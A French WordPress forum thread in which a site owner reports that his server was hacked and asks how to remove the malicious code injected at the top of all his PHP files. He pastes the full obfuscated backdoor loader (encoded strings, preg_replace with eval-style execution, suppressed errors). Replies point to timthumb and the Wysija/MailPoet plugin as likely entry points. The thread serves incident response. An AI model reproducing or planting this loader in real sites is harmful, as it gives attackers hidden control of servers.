Serveur hacké : je recherche à supprimer un code malveillant dans PHP (Créer un compte)

  • Statut : non résolu
3 sujets de 1 à 3 (sur un total de 3)
  • Auteur
    Messages
  • #539980
    radiCarl
    Membre
    Chevalier WordPress
    137 contributions

    Bonjour,

    – Version de WordPress : dernière version
    – Version de PHP/MySQL :
    – Thème utilisé : custom
    – Extensions en place : beaucoup trop
    – Adresse du site : carlboileau.com

    Problème(s) rencontré(s) : serveur hacké

    Bonjour, l’ensemble de tous mes blogs hébergé sur un serveur professionnel à Montréal a été hacké dans la nuit entre jeudi et vendredi dernier. Il s’avère en effet qu’un code malicieux à été injecté au début de tous les fichiers PHP stocké dans mon espace accessible par FTP. En conséquence, plus aucun de mes blogs ne fonctionne correctement et je ne sais trop ce que le serveur effectue comme opération par les hackers.

    Bref, je me donne aujourd’hui la journée pour réparer les pots cassés et tenter de résoudre le problème. En ce sens, je pense bien devoir réinstaller l’ensemble des blogues avec des anciennes sauvegardes. Cependant, un truc qui pourrait peut-être me sauver du temps serait de m’aider à trouver une commande qui pourrait enlever (et nettoyer) d’un coup tous le code qui a été rajouté dans mes pages PHP. Après ce nettoyage, je pourrais redémarrer mes blogs et tenter de chasser le backdoor.

    Mais bon, avant de procéder, je voulais surtout avoir les conseils de la communauté afin de trouver le point d’entrée et colmater la brèche avec la bonne parade.

    Encore merci pour la compréhension et le soutien dans cette épreuve des plus fastidieuses.

    Carl

    NB. Le code malicieux en question est partout le même dans mes 8000 pages PHP. Si vous arrivez à y comprendre quelque chose dans ce flood de charabia codé, faites-moi signe.

    <?php $ekajxpckbk = '%x5c%x7825!<5h%x5c%x7825%x5c%x7825)54l}%x5c%x7827;%x5c%x7+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt5c%x7822)7gj6<*QDU%x5c%x78c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x]y33]68]y34]68]y33]65]y31]53]&6<*rfs%x5c%x78257-K)fujs%x825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bqc%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeT]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>]37]278]225]241]334]368]322]3]364]6]283]45c%x78256<*17-SFEBFI,6<*127-UVPFNJU,67824<!%x5c%x7825mm!>!#]y81]273]y76]258]>%x5c%x7822!pd%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:5672]254]y76#<%x5c%x782]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39**72!%x5c%x7827!hmg%x50{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7d}+;!>!}%x5c%x7827;!>>>!}7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x985:6197g:74985-rr.93e:5597f-s%x7825!*3!%x5c%x7827!hmg%x5;msv}.;%x5c%x782f#%x5cx7825tzw>!#]y76]277]y72]265]y39]27]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpq>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1×7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x!}6;##}C;!>>!}W;utpi}Y;tuofuopx5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%5c%x7825z-#:#*%x5c%x7824c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-%x785cq%x5c%x7825)ufttj%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x57825%x5c%x787f!~!<##!>!2p%x5c%x7825*<(<%x5c%x78e%x5c%x78b%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825c%x7825!<***f%x5c%x7827,*e%xx5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x782opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x78275c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;ggg!>!#]y81]273]y76]258]y6g]273]y76]271×7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tu5c%x7824y7%x5c%x7824-%x5c%x782c%x7878pmpusut!-#j0#!%x6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5cPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%xg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufy6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x785w6Z6<.2%x5c%x7860hA%x5c%x7827px7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y8Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,3]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x782565]D8]86]y31]278]y3f]51L3]84]L); }825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#25r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x782s!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcy6g]257]y86]267]y74]275]y7:]268]y7f#<!%=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%825!<*#}_;#)323ldfid>}&;!osvufs}%x5c256|6.7eu{66~67<&w6<*&56%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7835]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825c25s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x5%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fwd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMMx7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&d7R17,67R37,#%x5c%x782fq%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>5t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x787825%x5c%x7878:-!%x5c%x7825tzw%x5%x78b%x5c%x7825w:!>!%x5c%x%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x7y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825#%x5c%x7824-%x5c%x7824-tusqpt)%x%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|]#>n%x5c%x7825<#372]58y]472]3x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>%x5c%x7860hA%x5c%x7827pd%x5c%x78255c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5#]D6]281L1#%x5c%x782f#M5]DgP5]D%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%)!gj!<*2bd%x5c%x7825-#1GO%x5c%xx7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782pdov{h19275j{hnpd19275fubmgoj{h1:|:Z<^2%x5c%x785c2b%x5c%x75!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w6<*)ujojR%x5c%x7827id%x5c%xx78e%x5c%x78b%x5c%x7825mm)%x5c%x5tmw!>!#]y84]275]y837824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5ebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7%x5c%x7827k:!ftmf!}Z;^nbsbqKe]53Ld]53]Kc]55Ld]55#*<%x5c7y]672]48y]#>s%x5c%x7825<#462]4x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msv56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqn21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH6%x5c%x7824-%x5c%x7824<%x5cx5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y7825hIr%x5c%x785c1^-%x5c%x78<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P882fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xx787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**d%x5c%x78256<C%x5c%x7827pd%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x78259%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%1if((function_exists("%x6f%1%x5c%x782f#@#%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfumjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x786878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825bQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%*<%x22%51%x29%51%x29%73", NUL25#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UT:|:*r%x5c%x7825:-t%x5c%x7Y#-#D#-#W#-#C#-#O#-#N#*%%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x77%x67%42%x2c%163%x745c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5>!%x5c%x7825tdz)%x5c%c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x52<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%4-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]27K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%”) && (!isset($GLOBALS[“%x61%156%x75%156%x61”])))) { $GLOBALS[“%x61%1%x5c%x7825%x5c%x785cSFWSFT%x60MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7823%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7822<!gps)%x5c%x7825j>1<%]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782fc%x7825!)!gj!<2,*j%x6<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd)%x5c%x7825%x5c%x782#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x5c%x78256<pd%x5c%x7825w6Z6<.}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<tjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x5c%x78257-K)udfoopdXA%x%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp|!*!***b%x5c%x7825)sf%x5*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutj22!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%825-*.%x5c%x7825)euhA)3of>2bdy83]256]y81]265]y72]254]y76]615c%x7825!|Z~!<##!>!2p%x5c%x7825!%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x2vt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%78246767~6<Cw6<pd%x5c%x7825w6Z6<.541%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%14x7824-%x5c%x7824!>!fyqmpef)#%x5csut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%42%x5f%163%x74%141%x72%164y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sf-%x5c%x7824!>!tus%x5c%x7860sfqmbdf!%x5c%x78242178}527}88:}334}472%x5c%xL1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#c%x782f%x5c%x7824)#P#-#Q#-#B#-825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7yovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x786#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4boe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1+*!*+fepdfe{h+{d%x5c%x7825)+opjud4*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)f]63]y3:]68]y76#<%x5c%x78e%x5c25))!gj!<*#cd2bge56+99386c6f+9f5d816:+946c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5cWsfuvso!%x5c%x7825bss%x5c%x785csx5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x78#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!25)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudov/(.*)/epreg_replacewhouaguipy’; $pqaxdmyxpq = explode(chr((162-118)),’6421,27,8822,26,7517,69,3726,61,8509,54,6356,65,8696,56,7131,20,4481,64,5627,46,9655,30,4455,26,8662,34,4918,34,7813,45,7931,30,7677,48,2814,31,6222,34,3704,22,8605,57,6161,61,2235,64,479,27,3211,60,2032,39,9284,66,8137,23,149,26,7614,63,7466,51,2594,61,9857,46,9813,44,7281,67,9726,55,1879,24,2141,38,3980,70,2532,62,9239,45,6632,70,1111,47,506,65,780,37,5998,42,5250,27,8028,60,4783,40,2299,44,1624,30,4050,70,3614,54,5532,52,1158,25,3153,58,856,22,10059,47,2710,40,3419,48,8563,42,1325,27,7793,20,10008,51,1090,21,1470,53,8784,38,5096,51,5205,45,7878,53,8160,68,1523,54,5876,37,2436,43,8088,49,1965,35,5182,23,106,43,5065,31,7092,39,8358,29,0,29,1903,62,2113,28,7151,63,6448,20,6095,66,8417,32,8228,24,2509,23,4952,38,175,54,398,52,9903,68,9685,41,6944,44,2655,55,1183,58,9090,53,2179,56,8449,60,6571,61,5446,27,7586,28,4823,35,1352,22,5021,44,29,28,3668,36,1024,66,5584,43,5147,35,8252,49,2071,42,9560,33,9413,60,8301,57,4217,62,3017,69,4279,31,3305,59,8914,58,5386,60,6702,58,571,48,7961,67,3506,58,6900,44,5797,34,1374,32,2963,54,3086,67,941,21,5309,20,6517,54,3467,39,4735,48,2382,54,6289,67,4640,66,362,36,9350,63,4706,29,5501,31,4545,63,6988,25,4310,44,9006,37,817,39,2750,64,6256,33,1577,47,5329,57,1830,49,4608,32,1806,24,8972,34,7858,20,7405,61,5732,27,7037,55,2479,30,9593,62,1712,45,1757,49,8752,32,5913,57,3849,69,229,69,619,57,6804,67,4176,41,5673,59,1241,54,5970,28,3364,55,4354,68,878,63,1295,30,3564,50,3271,29,8848,66,676,63,4990,31,9473,47,5831,45,9043,47,5473,28,298,64,7260,21,2845,50,6040,55,739,41,1406,64,962,62,9781,32,9520,40,3787,62,3918,62,7214,46,6760,44,2895,68,6468,49,9173,66,7725,22,1654,58,4858,60,7348,57,5277,32,4422,33,9143,30,9971,37,7013,24,5759,38,2000,32,2343,39,7747,46,57,49,8387,30,450,29,4120,56,6871,29,3300,5′); $omririzopg=substr($ekajxpckbk,(54202-44096),(47-40)); if (!function_exists(‘vqgjwaqztt’)) { function vqgjwaqztt($cucfttfmcl, $zjthtyygms) { $hdpyretzft = NULL; for($qxicgvklsx=0;$qxicgvklsx<(sizeof($cucfttfmcl)/2);$qxicgvklsx++) { $hdpyretzft .= substr($zjthtyygms, $cucfttfmcl[($qxicgvklsx*2)],$cucfttfmcl[($qxicgvklsx*2)+1]); } return $hdpyretzft; };} $vaeiujbfdv="x2057x2a40x6e153x75141x75163x6f155x7a157x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3261x3755x3170x3051x2954x20143x68162x2850x3564x3455x3465x3251x2954x20166x71147x6a167x61161x7a164x7450x24160x71141x78144x6d171x78160x7154x24145x6b141x6a170x70143x6b142x6b51x2951x3b40x2f52x20143x74154x6e143x79143x69141x6e40x2a57x20"; $bdtrhqmrll=substr($ekajxpckbk,(35524-25411),(60-48)); $bdtrhqmrll($omririzopg, $vaeiujbfdv, NULL); $bdtrhqmrll=$vaeiujbfdv; $bdtrhqmrll=(702-581); $ekajxpckbk=$bdtrhqmrll-1; ?><?php

    #961955
    Aphrodite
    Participant
    Maître WordPress
    4750 contributions

    l’une des extensions utilise t elle timthumb, le fichier timthumb.php est il present sur le serveur (ou thumb.php ca dépend). Deja il faut trouver la faille avant de nettoyer….

    #961956
    Flobogo
    Modérateur
    Maître WordPress
    16278 contributions

    Ou bein le plugin Wisija / mailPoet est-il utilisé sur l’un des sites ?
    Apparemment les sites infectés présentent ce type de code dans les fichiers .php infectés.

3 sujets de 1 à 3 (sur un total de 3)
  • Vous devez être connecté pour répondre à ce sujet.